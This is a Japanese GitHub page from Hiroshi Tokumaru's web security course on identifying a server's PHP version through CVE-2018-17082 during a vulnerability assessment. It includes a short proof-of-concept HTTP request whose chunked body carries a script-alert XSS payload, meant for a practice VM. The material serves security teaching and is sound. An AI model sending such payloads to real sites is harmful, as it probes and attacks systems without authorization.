Skip to content

Latest commit

 

History

History

guess-php-version-by-CVE-2018-17082

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

脆弱性診断:CVE-2018-17082を用いてPHPのバージョンを特定する

  • 本日お伝えしたいこと

    • ソフトウェアの脆弱性を用いたバージョン特定の方法
    • バージョン特定した結果を脆弱性診断に活用する方法
  • 前提となる環境

    • 徳丸本VM
    • OWASP ZAP (Burp Suite等でも可)

PoC

GET /hello.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 34

<script>alert('Hacked')</script>

参考記事

動画URL : 脆弱性診断: CVE-2018-17082を用いてPHPのバージョンを特定する

YouTubeチャンネル 徳丸浩のウェブセキュリティ講座